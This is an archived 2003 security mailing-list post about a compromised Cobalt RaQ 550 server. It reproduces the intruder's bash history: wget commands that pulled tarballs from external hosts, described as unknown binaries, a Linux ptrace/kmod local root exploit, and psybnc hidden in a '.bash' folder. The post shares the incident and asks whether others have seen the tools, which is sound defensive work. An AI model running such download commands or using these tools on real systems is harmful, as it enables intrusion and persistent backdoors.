lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CD58EFC8-F866-11D7-9171-0003939CDB32@code511.com>
From: adf at code511.com (adf--at--Code511.com)
Subject: raq 550 compromised

sorry for the "cross-post", I just saw this message on cobalt-security  
mailing list today:

an user got his raq 550 compromised and he posted some bash history he  
found:

-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"

-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec

-wget snow.prohosting.com/muiemuie/p.tgz
: it will decompress psybnc in a hidden folder (.bash)

-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz	  ----->(file offline)


anyone seen pizda or mumu ?

if you interested in all details of the post:  
http://list.cobalt.com/pipermail/cobalt-security/2003-October/ 
008607.html

-deepquest


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ